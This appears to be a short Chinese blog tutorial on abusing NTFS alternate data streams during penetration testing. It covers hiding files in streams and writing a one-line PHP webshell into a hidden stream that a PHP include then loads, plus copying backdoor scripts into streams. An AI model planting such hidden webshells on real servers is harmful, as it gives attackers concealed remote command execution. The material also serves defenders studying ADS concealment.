Windows-NTFS-ADS在渗透测试中的利用

0、什么是ADS


+ Windows:微软公司的一款视窗操作系统,其内核为WindowsNT。 + NTFS:WindowsNT环境的限制级专用文件系统。 + ADS:NTFS的系统特性,交换数据流(Alternate data streams)简称ADS

1、ADS在渗透测试中的应用


1.1、隐藏文件


1.1.1、挂载普通文件上


C:\>echo hacker_code > settings.conf:hacker.txt

C:\>dir
 驱动器 C 中的卷没有标签。
 卷的序列号是 6433-1B15

 C:\ 的目录

2018/07/04  18:54             5,490 b.py
2018/10/15  17:08    <DIR>          LudashiDownloads
2018/11/29  11:21    <DIR>          mimi
2018/07/04  21:19    <DIR>          mimikatz_trunk
2009/07/14  11:20    <DIR>          PerfLogs
2019/01/11  16:22    <DIR>          phpStudy
2018/11/29  11:15    <DIR>          Program Files
2019/01/11  16:52    <DIR>          Program Files (x86)
2018/10/12  17:08    <DIR>          Python27
2019/02/25  11:39                 0 settings.conf
2019/01/14  17:12    <DIR>          Users
2018/07/10  16:27    <DIR>          Windows
               2 个文件          5,490 字节
              10 个目录 47,861,686,272 可用字节

我们发现settings.conf创建成功但是没有内容,hacker.txt(有内容)被隐藏起来,只能通过dir /r来发现,只要删除依赖文件settings.conf才能删除隐藏文件


1.1.2 挂载在路径上


如果直接建立文件夹或者c这种路径下,那么依赖的就是文件夹或者路径了,删除的时候需要删除文件夹,但是C这种盘符路径不能删除怎么破呢?


删除文件夹后

如果是C盘盘符路径这种,就需要用二进制编辑器去编辑。

2、写webshell和动态脚本后门以及后门


2.1、写webshell


echo "<?php @system($_POST["cmd"]); ?>"   >   1.txt:1.php
<?php
    include("1.txt:1.php");
?>  

2.2 写脚本和后门


type xxx.xxx > 1.txt:1.xxx

2.3、运行vbs脚本


cscript xxx.vbs
posted @ 2020-09-03 14:56  斑林鸽的代码世界  阅读(316)  评论(0编辑  收藏  举报